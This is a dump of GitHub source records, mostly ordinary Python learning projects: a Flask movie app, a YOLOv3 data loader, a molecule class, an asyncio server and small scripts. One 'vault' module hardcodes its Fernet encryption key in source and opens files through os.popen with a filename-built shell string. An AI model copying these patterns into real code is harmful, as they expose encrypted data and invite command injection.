myurl='https://image.tmdb.org/t/p/w500'+m.poster_path\r\n\r\n genre=[]\r\n\r\n li=m.genres\r\n for el in li :\r\n genre.append(el['name'])\r\n\r\n res={ 'id': m.id ,'title':m.title,'overview':m.overview, 'rating': m.vote_average,'imgpath':myurl,'genre':genre}\r\n print(res)\r\n\r\n return render_template('movieinfo.html',res=res)\r\n except Exception:\r\n return \" unable to reach try later\"\r\n\r\n\r\n pass\r\n\r\n@app.route('/fav')\r\n\r\ndef fav():\r\n return render_template('fav.html')\r\n \r\n\r\n\r\n \r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)","repo_name":"prajwalsable99/life_uncut","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72475652891","text":"from .config import CfgNode as CN\n\n\n_C = CN()\n\n_C.MAX_EPOCH = 20\n_C.NUM_WORKERS = 16\n_C.BATCH_SIZE = 64\n_C.DEVICE = 'cuda'\n# OUTPUT\n_C.OUTPUT_NAME = ''\n_C.EXTRA = ''\n# TASK\n_C.TASK = 'TEST'\n_C.DATE = ''\n\n# dataset\n_C.DATASET = CN()\n_C.DATASET.TRAIN_MODE = 'train'\n_C.DATASET.NUM_CLASSES = 5\n_C.DATASET.ROOT_PATH = ''\n_C.DATASET.AUGMENTATION = CN()\n_C.DATASET.AUGMENTATION.NAME = ''\n_C.DATASET.FUNC = 'CustomDataset'\n\n\n# model\n_C.MODEL = CN()\n_C.MODEL.NAME = ''\n_C.MODEL.WEIGHTS = None\n_C.MODEL.PRETRAINED = True\n\n\n# METRIC\n_C.MODEL.METRIC = CN()\n_C.MODEL.METRIC.NAME = None\n\n# HEAD\n_C.MODEL.HEAD = CN()\n_C.MODEL.HEAD.NAME = 'MultiHead'\n\n# INPUT\n_C.INPUT = CN()\n_C.INPUT.SIZE = (360, 240)\n\n# SOLVER\n_C.SOLVER = CN()\n_C.SOLVER.OPTIMIZER = CN()\n_C.SOLVER.OPTIMIZER.NAME = 'RAdam'\n_C.SOLVER.OPTIMIZER.LR_START = 2e-3\n\n# LOSS\n_C.SOLVER.LOSS = CN()\n_C.SOLVER.LOSS.NAME = 'CrossEntropyLoss'\n\n_C.SOLVER.ACCUMULATE_STEPS = 1\n","repo_name":"markson14/PyTorchEngine","sub_path":"engine/config/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3353567204","text":"#--*--coding:utf-8\n#Author:cnn\n#画椭圆\nimport pygame\nimport sys\nfrom pygame.locals import *\n# pygame 初始化\npygame.init()\n# 设置背景颜色和线条颜色\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n# 设置背景框大小\nsize = width, height = 600, 600\n#position = width // 2, height // 2\n# 设置帧率,返回clock 类\nclock = pygame.time.Clock()\n\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"llls make\")\n\n# 填充背景色\nscreen.fill(WHITE)\n\n# 画一个圆和一个椭圆\npygame.draw.ellipse(screen, RED, (100, 100, 400, 100), 1)\npygame.draw.ellipse(screen, GREEN, (100, 100, 400, 400), 1)\n# 刷新图\npygame.display.flip()\nclock.tick(60)\nwhile True:\n for event in pygame.event.get():\n # 查找关闭窗口事件\n if event.type == QUIT:\n sys.exit()\n\n","repo_name":"gustcnn/SolarSystem","sub_path":"com/solar/oval.py","file_name":"oval.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35917391879","text":"import sqlite3\r\nimport os\r\nfrom cryptography.fernet import Fernet\r\nimport ezlog\r\n\r\nvault_log = ezlog.MyLogger(\r\n name='vault_log', form='time:[level][function]: msg', file='logs/vault_log.log')\r\n\r\n\r\nclass Vault:\r\n KEY = b'f0e0HQdoUptcnOHYOjmhbjiYCYzPojVFSOhsoLwOMik='\r\n CRYPTER = Fernet(KEY)\r\n\r\n def __init__(self, name, encrypted=False):\r\n\r\n self.make_dir('cache')\r\n self.make_dir('temp')\r\n self.make_dir('data')\r\n self.name = name\r\n self.db = sqlite3.connect(name)\r\n self.c = self.db.cursor()\r\n try:\r\n self.db.execute('''\r\n CREATE TABLE files (filename varchar(255) PRIMARY KEY NOT NULL UNIQUE, data TEXT)''')\r\n vault_log.info('creating database')\r\n except Exception:\r\n pass\r\n\r\n self.encrypted = encrypted\r\n\r\n @staticmethod\r\n def make_dir(name):\r\n try:\r\n os.mkdir(name)\r\n vault_log.info(f'making {name} folder')\r\n except FileExistsError:\r\n pass\r\n\r\n def store(self, file):\r\n basename = os.path.basename(file)\r\n vault_log.debug(f'Attempting to add file: \"{basename}\" to the vault')\r\n with open(file, 'rb') as f:\r\n data = f.read() if not self.encrypted else self.encrypt(f.read())\r\n with self.db:\r\n self.c.execute(\"insert into files values (?, ?);\",\r\n (basename, data))\r\n os.remove(file)\r\n vault_log.debug(f'file: \"{basename}\" successfully added')\r\n\r\n def show_files(self):\r\n output = self.c.execute('select filename from files')\r\n vault_log.info('items listed')\r\n return [name[0]for name in output.fetchall()]\r\n\r\n def get(self, file):\r\n temp_items = os.listdir('temp')\r\n vault_log.debug(f'Attempting to get file: \"{file}\" from vault')\r\n if file in self.keys and file not in temp_items:\r\n vault_log.debug(f'file: \"{file}\" written to temp folder')\r\n result = self.c.execute(\r\n 'SELECT * FROM files WHERE filename=?', (file,))\r\n filename, data = result.fetchone()\r\n if self.encrypted:\r\n data = self.decrypt(data)\r\n with open('temp/' + filename, 'wb') as unlock:\r\n unlock.write(data)\r\n os.popen(f'\"temp/{file}\"')\r\n vault_log.info(f'file: \"{file}\" ran successfully')\r\n else:\r\n vault_log.debug(\r\n f'file: \"{file}\" is not in database or is already in temporary view folder')\r\n\r\n def remove(self, file):\r\n vault_log.debug(f'attempting to delete file: \"{file}\" from the vault')\r\n if file in self.keys:\r\n result = self.c.execute(\r\n 'SELECT * FROM files WHERE filename=?', (file,))\r\n filename, data = result.fetchone()\r\n if self.encrypted:\r\n data = self.decrypt(data)\r\n with self.db:\r\n self.c.execute(\r\n 'DELETE FROM files where filename=?', (filename,))\r\n self.vacuum()\r\n vault_log.debug(\r\n f'file: \"{file}\" was deleted from database')\r\n return filename, data\r\n\r\n def move_out(self, file, destination='.'):\r\n if file in self.keys:\r\n filename, data = self.remove(file)\r\n with open(f'{destination}/{filename}', 'wb') as moved:\r\n moved.write(data)\r\n vault_log.debug(\r\n f'file: \"{file}\" moved out of the vault to {destination}')\r\n\r\n def vacuum(self):\r\n with self.db:\r\n self.c.execute('VACUUM')\r\n vault_log.info('database extra size vacuumed')\r\n\r\n @staticmethod\r\n def encrypt(data):\r\n vault_log.info('data for file encrypted')\r\n return Vault.CRYPTER.encrypt(data)\r\n\r\n @staticmethod\r\n def decrypt(data):\r\n vault_log.info('data for file dencrypted')\r\n return Vault.CRYPTER.decrypt(data)\r\n\r\n @property\r\n def keys(self):\r\n output = self.c.execute('SELECT filename FROM files')\r\n vault_log.info('items listed')\r\n return [name[0] for name in output.fetchall()]\r\n\r\n @staticmethod\r\n def clean_up():\r\n vault_log.debug('cleaning up temporary')\r\n for file in os.listdir('temp'):\r\n os.remove('temp/' + file)\r\n vault_log.debug('temporary items successfully removed')\r\n","repo_name":"hank2q/The-Vault","sub_path":"vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14295034684","text":"def sort_rows(lst):\n\n return sorted(lst, key=lambda row: sum(row))\n\ndef print_list(lst):\n\n for row in lst:\n print(\" \".join(str(x) for x in row))\n\n\nrows = int(input(\"Enter the number of rows: \"))\ncols = int(input(\"Enter the number of columns: \"))\n\nlst = []\nfor i in range(rows):\n row = input(\"Enter the values for row {}: \".format(i+1))\n lst.append([int(x) for x in row.split()])\n\nlst_sorted = sort_rows(lst)\nprint_list(lst_sorted)\n","repo_name":"Vaish-cse/python","sub_path":"rows.py","file_name":"rows.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74235970651","text":"import numpy as np\nfrom qgrep.atom import atomic_masses, atomic_numbers\n\nfrom cclib.io import ccread\n\n\nclass Molecule:\n def __init__(self, geom=None):\n \"\"\" Simple molecule class\n\n :param geom: List of lists ordered as [[atom, [x, y, z]], ...]\n \"\"\"\n # Magically unpacks\n self.geom = geom\n\n def __len__(self):\n \"\"\"Return the number of atoms in the molecule\"\"\"\n return len(self.atoms)\n\n def __str__(self):\n \"\"\"\n Returns a string of the geometry, filling out positions with zeros and\n spaces as needed\n \"\"\"\n form = '{:<4}' + ' {:> 13.8f}' * 3\n return '\\n'.join([form.format(atom, *xyz) for atom, xyz in self])\n\n def __iter__(self):\n for atom, xyz in zip(self.atoms, self.xyz):\n yield atom, xyz\n\n def __add__(self, other):\n \"\"\" Combine two molecules \"\"\"\n if isinstance(self, Molecule) and isinstance(self, Molecule):\n return Molecule(self.geom + other.geom)\n else:\n raise ValueError(f'Cannot combine {type(self)} and {type(other)}')\n\n def __getitem__(self, i):\n \"\"\"Returns the ith atom\"\"\"\n return (self.atoms[i], self.xyz[i])\n\n def __setitem__(self, i, atom_xyz):\n \"\"\"Sets the ith atom\"\"\"\n atom, xyz = atom_xyz\n Molecule.check_atom(atom, xyz)\n self.atoms[i] = atom\n self.xyz[i] = xyz\n\n def __delitem__(self, i):\n \"\"\"Deletes the ith atom\"\"\"\n del self.atoms[i]\n self.xyz = np.delete(self.xyz, i, axis=0)\n\n def __eq__(self, other):\n if not isinstance(other, Molecule):\n return False\n if self.atoms != other.atoms or (self.xyz != other.xyz).any():\n return False\n return True\n\n def insert(self, i, atom, xyz):\n \"\"\"Insert the atom in the specified position\"\"\"\n Molecule.check_atom(atom, xyz)\n self.atoms.insert(i, atom)\n self.xyz = np.insert(self.xyz, i, xyz, axis=0)\n\n @property\n def geom(self):\n \"\"\"Return the geometry\"\"\"\n return [[atom, list(xyz)] for atom, xyz in self]\n\n @geom.setter\n def geom(self, geom):\n \"\"\"Set the geometry\"\"\"\n self.atoms, self.xyz = [], np.array([])\n if geom is not None:\n Molecule.check_geom(geom)\n atoms, xyzs = zip(*geom)\n self.atoms = list(atoms)\n self.xyz = np.array(xyzs)\n\n def append(self, atom, xyz):\n \"\"\"Append atom to geometry\"\"\"\n Molecule.check_atom(atom, xyz)\n self.atoms.append(atom)\n if len(self.xyz) > 0:\n self.xyz = np.append(self.xyz, np.array(xyz)[np.newaxis, ...], axis=0)\n else:\n self.xyz = np.array(xyz)[np.newaxis, ...]\n\n @staticmethod\n def check_atom(atom, xyz):\n \"\"\" Check if an atom is properly formatted\n Raises a syntax error if it is not\n \"\"\"\n if not isinstance(atom, str):\n raise SyntaxError(f'Atom name must be a string: {atom}')\n if len(xyz) != 3:\n raise SyntaxError('Only 3 coordinates supported.')\n return True\n\n @staticmethod\n def check_geom(geom):\n \"\"\" Checks if the given geometry is valid\n raises a syntax error if it is not\n \"\"\"\n for atom, xyz in geom:\n Molecule.check_atom(atom, xyz)\n\n return True\n\n @staticmethod\n def read_from(infile):\n \"\"\"Read from a file\"\"\"\n try:\n data = ccread(infile)\n # Hack: cclib doesn't have an easy way to access atom names\n lines = data.writexyz().splitlines()\n except AttributeError as e:\n # Attempt to read as an XYZ file\n with open(infile) as f:\n lines = f.readlines()\n # Strip off length if provided\n if lines[0].strip().isdigit():\n lines = lines[2:]\n geom = []\n for line in lines:\n if line.strip() == '':\n continue\n atom, x, y, z = line.split()[:4]\n geom.append([atom, [float(x), float(y), float(z)]])\n\n return Molecule(geom)\n\n def write(self, outfile='geom.xyz', label=True, style='xyz'):\n \"\"\"\n Writes the geometry to the specified file\n Prints the size at the beginning if desired (to conform to XYZ format)\n \"\"\"\n out = ''\n if style == 'xyz':\n if label:\n out += f'{len(self)}\\n\\n'\n out += f'{self}'\n elif style == 'latex':\n header = f'{len(self)}\\\\\\\\\\n'\n line_form = '{:<2}' + ' {:> 13.6f}' * 3\n atoms = [line_form.format(atom, *xyz) for atom, xyz in self]\n atoms = '\\n'.join(atoms)\n out = '\\\\begin{verbatim}\\n' + atoms + '\\n\\\\end{verbatim}'\n else:\n raise SyntaxError('Invalid style')\n with open(outfile, 'w') as f:\n f.write(out)\n\n def center_of_mass(self, masses=None):\n \"\"\"\n Finds the center of mass\n :param masses: a dictionary or list of masses to use\n \"\"\"\n if isinstance(masses, list):\n masses_list = masses\n elif isinstance(masses, dict):\n masses_list = [masses[atomic_numbers[atom]] for atom in self.atoms]\n elif masses is None:\n masses_list = [atomic_masses[atomic_numbers[atom]] for atom in self.atoms]\n else:\n raise ValueError(f'Expected a list or dictionary of masses, got: {type(masses)}')\n\n com = np.zeros(3)\n total_mass = 0\n for mass, xyz in zip(masses_list, self.xyz):\n com += mass*np.array(xyz)\n total_mass += mass\n\n return com/total_mass\n\n def moment_of_inertia_tensor(self, masses=None):\n \"\"\"\n Generates the moment of intertia tensor (3x3).\n :param masses: a dictionary or list of masses to use\n com = self.center_of_mass(masses)\n \"\"\"\n if isinstance(masses, list):\n masses_list = masses\n elif isinstance(masses, dict):\n masses_list = [masses[atomic_numbers[atom]] for atom in self.atoms]\n elif masses is None:\n masses_list = [atomic_masses[atomic_numbers[atom]] for atom in self.atoms]\n else:\n raise ValueError(f'Expected a list or dictionary of masses, got: {type(masses)}')\n\n com = self.center_of_mass(masses)\n\n moi_tensor = np.zeros((3, 3))\n for mass, xyz in zip(masses_list, self.xyz):\n x, y, z = xyz - com\n moi_tensor += mass * np.array([[y**2 + z**2, -x*y, -x*z],\n [ -y*x, x**2 + z**2, -y*z],\n [ -z*x, -z*y, x**2 + y**2]])\n return moi_tensor\n\n def reorder(self, order):\n \"\"\"\n :param order: new order for the molecule\n :return: molecule with atoms reordered\n \"\"\"\n geom = ['']*len(self)\n for atom, i in zip(self, order):\n geom[i] = atom\n\n assert not any((atom == '' for atom in geom))\n\n return Molecule(geom)\n\n","repo_name":"jevandezande/qgrep","sub_path":"qgrep/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"23456563971","text":"import asyncio\nfrom asyncio import transports\nfrom typing import Optional\n\n\nclass ClientProtocol(asyncio.Protocol):\n login: str\n server: 'Server'\n transport: transports.Transport\n\n def __init__(self, server: 'Server'):\n self.server = server\n\n def data_received(self, data: bytes):\n print(data)\n\n def connection_made(self, transport: transports.Transport):\n self.transport = transport\n self.server.clients.append(self)\n print('connection established')\n\n def connection_lost(self, exception):\n self.server.clients.remove(self)\n print('connection lost')\n\n\nclass Server:\n clients: list\n\n def __init__(self):\n self.clients = []\n\n def create_protocol(self):\n return ClientProtocol(self)\n\n async def start(self):\n loop = asyncio.get_running_loop()\n coroutine = await loop.create_server(\n self.create_protocol,\n '127.0.0.1',\n 8888\n )\n print('server was started ...')\n\n await coroutine.serve_forever()\n\n\nprocess = Server()\nasyncio.run(process.start())\n","repo_name":"avkulistov/python","sub_path":"messanger/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70291398492","text":"import math\n\nif __name__ == \"__main__\":\n n, m = map(int, input().split())\n\n tree = list(map(int, input().split()))\n tree.append(0)\n tree.sort(reverse=True)\n t_sum = 0\n t_count = 1\n re = 0\n for i in range(n):\n if t_sum + t_count * (tree[i] - tree[i + 1]) >= m:\n re += math.ceil((m - t_sum) / t_count)\n t_sum += math.ceil((m - t_sum) / t_count) * t_count\n break\n else:\n re += (tree[i] - tree[i + 1])\n t_sum += t_count * (tree[i] - tree[i + 1])\n t_count += 1\n\n print(tree[0] - re)\n","repo_name":"YDbata/Algorithm","sub_path":"baekjoon/2805/2805_나무자르기.py","file_name":"2805_나무자르기.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18345507483","text":"import os\nimport cv2\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport core.utils as utils\nfrom core.config import cfg\n\n\n\nclass Dataset(object):\n \"\"\"implement Dataset here\"\"\"\n def __init__(self, dataset_type):\n self.annot_path = cfg.TRAIN.ANNOT_PATH if dataset_type == 'train' else cfg.TEST.ANNOT_PATH\n self.input_sizes = cfg.TRAIN.INPUT_SIZE if dataset_type == 'train' else cfg.TEST.INPUT_SIZE\n self.batch_size = cfg.TRAIN.BATCH_SIZE if dataset_type == 'train' else cfg.TEST.BATCH_SIZE\n self.data_aug = cfg.TRAIN.DATA_AUG if dataset_type == 'train' else cfg.TEST.DATA_AUG\n\n self.train_input_sizes = cfg.TRAIN.INPUT_SIZE\n self.strides = np.array(cfg.YOLO.STRIDES)\n self.classes = utils.read_class_names(cfg.YOLO.CLASSES)\n self.num_classes = len(self.classes)\n self.anchors = np.array(utils.get_anchors(cfg.YOLO.ANCHORS))\n self.anchor_per_scale = cfg.YOLO.ANCHOR_PER_SCALE\n self.max_bbox_per_scale = 150\n\n self.annotations = self.load_annotations(dataset_type)\n self.num_samples = len(self.annotations)\n self.num_batchs = int(np.ceil(self.num_samples / self.batch_size))\n self.batch_count = 0\n\n\n def load_annotations(self, dataset_type):\n with open(self.annot_path, 'r') as f:\n txt = f.readlines()\n annotations = [line.strip() for line in txt if len(line.strip().split()[1:]) != 0]\n np.random.shuffle(annotations)\n return annotations\n\n def __iter__(self):\n return self\n\n def __next__(self):\n\n with tf.device('/cpu:0'):\n self.train_input_size = random.choice(self.train_input_sizes)\n self.train_output_sizes = self.train_input_size // self.strides\n\n batch_image = np.zeros((self.batch_size, self.train_input_size, self.train_input_size, 3))\n\n batch_label_sbbox = np.zeros((self.batch_size, self.train_output_sizes[0], self.train_output_sizes[0],\n self.anchor_per_scale, 5 + self.num_classes))\n batch_label_mbbox = np.zeros((self.batch_size, self.train_output_sizes[1], self.train_output_sizes[1],\n self.anchor_per_scale, 5 + self.num_classes))\n batch_label_lbbox = np.zeros((self.batch_size, self.train_output_sizes[2], self.train_output_sizes[2],\n self.anchor_per_scale, 5 + self.num_classes))\n\n batch_sbboxes = np.zeros((self.batch_size, self.max_bbox_per_scale, 4))\n batch_mbboxes = np.zeros((self.batch_size, self.max_bbox_per_scale, 4))\n batch_lbboxes = np.zeros((self.batch_size, self.max_bbox_per_scale, 4))\n\n num = 0\n if self.batch_count < self.num_batchs:\n while num < self.batch_size:\n index = self.batch_count * self.batch_size + num\n if index >= self.num_samples: index -= self.num_samples\n annotation = self.annotations[index]\n image, bboxes = self.parse_annotation(annotation)\n label_sbbox, label_mbbox, label_lbbox, sbboxes, mbboxes, lbboxes = self.preprocess_true_boxes(bboxes)\n\n batch_image[num, :, :, :] = image\n batch_label_sbbox[num, :, :, :, :] = label_sbbox\n batch_label_mbbox[num, :, :, :, :] = label_mbbox\n batch_label_lbbox[num, :, :, :, :] = label_lbbox\n batch_sbboxes[num, :, :] = sbboxes\n batch_mbboxes[num, :, :] = mbboxes\n batch_lbboxes[num, :, :] = lbboxes\n num += 1\n self.batch_count += 1\n return batch_image, batch_label_sbbox, batch_label_mbbox, batch_label_lbbox, \\\n batch_sbboxes, batch_mbboxes, batch_lbboxes\n else:\n self.batch_count = 0\n np.random.shuffle(self.annotations)\n raise StopIteration\n\n def random_horizontal_flip(self, image, bboxes):\n\n if random.random() < 0.5:\n _, w, _ = image.shape\n image = image[:, ::-1, :]\n bboxes[:, [0,2]] = w - bboxes[:, [2,0]]\n\n return image, bboxes\n\n def random_crop(self, image, bboxes):\n\n if random.random() < 0.5:\n h, w, _ = image.shape\n max_bbox = np.concatenate([np.min(bboxes[:, 0:2], axis=0), np.max(bboxes[:, 2:4], axis=0)], axis=-1)\n\n max_l_trans = max_bbox[0]\n max_u_trans = max_bbox[1]\n max_r_trans = w - max_bbox[2]\n max_d_trans = h - max_bbox[3]\n\n crop_xmin = max(0, int(max_bbox[0] - random.uniform(0, max_l_trans)))\n crop_ymin = max(0, int(max_bbox[1] - random.uniform(0, max_u_trans)))\n crop_xmax = max(w, int(max_bbox[2] + random.uniform(0, max_r_trans)))\n crop_ymax = max(h, int(max_bbox[3] + random.uniform(0, max_d_trans)))\n\n image = image[crop_ymin : crop_ymax, crop_xmin : crop_xmax]\n\n bboxes[:, [0, 2]] = bboxes[:, [0, 2]] - crop_xmin\n bboxes[:, [1, 3]] = bboxes[:, [1, 3]] - crop_ymin\n\n return image, bboxes\n\n def random_translate(self, image, bboxes):\n\n if random.random() < 0.5:\n h, w, _ = image.shape\n max_bbox = np.concatenate([np.min(bboxes[:, 0:2], axis=0), np.max(bboxes[:, 2:4], axis=0)], axis=-1)\n\n max_l_trans = max_bbox[0]\n max_u_trans = max_bbox[1]\n max_r_trans = w - max_bbox[2]\n max_d_trans = h - max_bbox[3]\n\n tx = random.uniform(-(max_l_trans - 1), (max_r_trans - 1))\n ty = random.uniform(-(max_u_trans - 1), (max_d_trans - 1))\n\n M = np.array([[1, 0, tx], [0, 1, ty]])\n image = cv2.warpAffine(image, M, (w, h))\n\n bboxes[:, [0, 2]] = bboxes[:, [0, 2]] + tx\n bboxes[:, [1, 3]] = bboxes[:, [1, 3]] + ty\n\n return image, bboxes\n\n def parse_annotation(self, annotation):\n\n line = annotation.split()\n image_path = line[0]\n if not os.path.exists(image_path):\n raise KeyError(\"%s does not exist ... \" %image_path)\n image = np.array(cv2.imread(image_path))\n bboxes = np.array([list(map(lambda x: int(float(x)), box.split(','))) for box in line[1:]])\n\n if self.data_aug:\n image, bboxes = self.random_horizontal_flip(np.copy(image), np.copy(bboxes))\n image, bboxes = self.random_crop(np.copy(image), np.copy(bboxes))\n image, bboxes = self.random_translate(np.copy(image), np.copy(bboxes))\n\n image, bboxes = utils.image_preporcess(np.copy(image), [self.train_input_size, self.train_input_size], np.copy(bboxes))\n \n updated_bb = []\n for bb in bboxes:\n x1, y1, x2, y2, cls_label = bb\n \n if x2 <= x1 or y2 <= y1:\n # dont use such boxes as this may cause nan loss.\n continue\n\n x1 = int(np.clip(x1, 0, image.shape[1]))\n y1 = int(np.clip(y1, 0, image.shape[0]))\n x2 = int(np.clip(x2, 0, image.shape[1]))\n y2 = int(np.clip(y2, 0, image.shape[0]))\n # clipping coordinates between 0 to image dimensions as negative values \n # or values greater than image dimensions may cause nan loss.\n updated_bb.append([x1, y1, x2, y2, cls_label])\n\n return image, np.array(updated_bb)\n\n def bbox_iou(self, boxes1, boxes2):\n\n boxes1 = np.array(boxes1)\n boxes2 = np.array(boxes2)\n\n boxes1_area = boxes1[..., 2] * boxes1[..., 3]\n boxes2_area = boxes2[..., 2] * boxes2[..., 3]\n\n boxes1 = np.concatenate([boxes1[..., :2] - boxes1[..., 2:] * 0.5,\n boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)\n boxes2 = np.concatenate([boxes2[..., :2] - boxes2[..., 2:] * 0.5,\n boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)\n\n left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])\n right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])\n\n inter_section = np.maximum(right_down - left_up, 0.0)\n inter_area = inter_section[..., 0] * inter_section[..., 1]\n union_area = boxes1_area + boxes2_area - inter_area\n\n return inter_area / (union_area + 1e-6)\n # added 1e-6 in denominator to avoid generation of inf, which may cause nan loss\n\n\n def preprocess_true_boxes(self, bboxes):\n\n label = [np.zeros((self.train_output_sizes[i], self.train_output_sizes[i], self.anchor_per_scale,\n 5 + self.num_classes)) for i in range(3)]\n bboxes_xywh = [np.zeros((self.max_bbox_per_scale, 4)) for _ in range(3)]\n bbox_count = np.zeros((3,))\n\n for bbox in bboxes:\n bbox_coor = bbox[:4]\n bbox_class_ind = bbox[4]\n\n onehot = np.zeros(self.num_classes, dtype=np.float)\n onehot[bbox_class_ind] = 1.0\n uniform_distribution = np.full(self.num_classes, 1.0 / self.num_classes)\n deta = 0.01\n smooth_onehot = onehot * (1 - deta) + deta * uniform_distribution\n\n bbox_xywh = np.concatenate([(bbox_coor[2:] + bbox_coor[:2]) * 0.5, bbox_coor[2:] - bbox_coor[:2]], axis=-1)\n bbox_xywh_scaled = 1.0 * bbox_xywh[np.newaxis, :] / self.strides[:, np.newaxis]\n\n iou = []\n exist_positive = False\n for i in range(3):\n anchors_xywh = np.zeros((self.anchor_per_scale, 4))\n anchors_xywh[:, 0:2] = np.floor(bbox_xywh_scaled[i, 0:2]).astype(np.int32) + 0.5\n anchors_xywh[:, 2:4] = self.anchors[i]\n\n iou_scale = self.bbox_iou(bbox_xywh_scaled[i][np.newaxis, :], anchors_xywh)\n iou.append(iou_scale)\n iou_mask = iou_scale > 0.3\n\n if np.any(iou_mask):\n xind, yind = np.floor(bbox_xywh_scaled[i, 0:2]).astype(np.int32)\n xind = np.clip(xind, 0, self.train_output_sizes[i] - 1) \n yind = np.clip(yind, 0, self.train_output_sizes[i] - 1) \n # This will mitigate errors generated when the location computed by this is more the grid cell location. \n # e.g. For 52x52 grid cells possible values of xind and yind are in range [0-51] including both. \n # But sometimes the coomputation makes it 52 and then it will try to find that location in label array \n # which is not present and throws error during training.\n\n label[i][yind, xind, iou_mask, :] = 0\n label[i][yind, xind, iou_mask, 0:4] = bbox_xywh\n label[i][yind, xind, iou_mask, 4:5] = 1.0\n label[i][yind, xind, iou_mask, 5:] = smooth_onehot\n\n bbox_ind = int(bbox_count[i] % self.max_bbox_per_scale)\n bboxes_xywh[i][bbox_ind, :4] = bbox_xywh\n bbox_count[i] += 1\n\n exist_positive = True\n\n if not exist_positive:\n best_anchor_ind = np.argmax(np.array(iou).reshape(-1), axis=-1)\n best_detect = int(best_anchor_ind / self.anchor_per_scale)\n best_anchor = int(best_anchor_ind % self.anchor_per_scale)\n xind, yind = np.floor(bbox_xywh_scaled[best_detect, 0:2]).astype(np.int32)\n xind = np.clip(xind, 0, self.train_output_sizes[i] - 1) \n yind = np.clip(yind, 0, self.train_output_sizes[i] - 1) \n # This will mitigate errors generated when the location computed by this is more the grid cell location. \n # e.g. For 52x52 grid cells possible values of xind and yind are in range [0-51] including both. \n # But sometimes the coomputation makes it 52 and then it will try to find that location in label array \n # which is not present and throws error during training.\n\n label[best_detect][yind, xind, best_anchor, :] = 0\n label[best_detect][yind, xind, best_anchor, 0:4] = bbox_xywh\n label[best_detect][yind, xind, best_anchor, 4:5] = 1.0\n label[best_detect][yind, xind, best_anchor, 5:] = smooth_onehot\n\n bbox_ind = int(bbox_count[best_detect] % self.max_bbox_per_scale)\n bboxes_xywh[best_detect][bbox_ind, :4] = bbox_xywh\n bbox_count[best_detect] += 1\n label_sbbox, label_mbbox, label_lbbox = label\n sbboxes, mbboxes, lbboxes = bboxes_xywh\n return label_sbbox, label_mbbox, label_lbbox, sbboxes, mbboxes, lbboxes\n\n def __len__(self):\n return self.num_batchs\n\n\n\n\n","repo_name":"YunYang1994/tensorflow-yolov3","sub_path":"core/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12800,"program_lang":"python","lang":"en","doc_type":"code","stars":3631,"dataset":"github-code","pt":"32"} +{"seq_id":"42904623659","text":"# -*- coding:utf-8 -8-\r\n\r\n# 设置标志位\r\ndef breakplay():\r\n while True:\r\n break_flag = raw_input('是否继续?(y/n)')\r\n if break_flag == 'y' or break_flag == 'n':\r\n return break_flag\r\n else:\r\n print(\"输入错误,请重新输入\")\r\n \r\ninfo_file = open('information.txt', 'r') # 只读文件的形式打开文件\r\n# 读入员工信息, 生成一个列表\r\nemployee_info = info_file.readlines()\r\ninfo_file.close()\r\n\r\nbreak_flag = ''\r\nprint(\"欢迎来到员工信息查询系统\")\r\n\r\nwhile break_flag != 'n':\r\n while True:\r\n search_info = raw_input(\"请输入您需要查询的信息...\")\r\n if len(search_info) > 2: # 判断输入字符的长度, 少于三个字符,需要重新输入\r\n break\r\n else:\r\n print(\"输入不合法,重新输入\")\r\n \r\n count_number = 0\r\n search_info_list = []\r\n for i in employee_info:\r\n if i.count(search_info) > 0:\r\n search_info_list.append(i.replace(search_info, '\\033[42;31;1m%s\\033[0m' % search_info))\r\n count_number += i.count(search_info)\r\n \r\n if count_number > 0:\r\n print(\"一共查询到: \\033[31; 1m %s \\033[0m 条信息 !\" % count_number)\r\n for i in search_info_list:\r\n print(i)\r\n break_flag = breakplay()\r\n else:\r\n print(\"没有查询到您需要的信息\")\r\n break_flag = breakplay()\r\n \r\n for i in range(2):\r\n print(\"感谢使用查询系统 %s 秒后, 系统退出\" % (3-i))\r\n exit()","repo_name":"quadrant26/oldboy_py","sub_path":"day2/find_light.py","file_name":"find_light.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32332786645","text":"from flask import Blueprint,render_template,redirect,url_for\r\nfrom flask_login import login_required,current_user\r\n\r\nviews =Blueprint('views',__name__)\r\n\r\n@views.route('/')\r\ndef home():\r\n if current_user.is_authenticated:\r\n return render_template(\"base.html\")\r\n else:\r\n return redirect(url_for('auth.login'))\r\n\r\n\r\n@views.route('/admin')\r\ndef admin():\r\n return \"admin 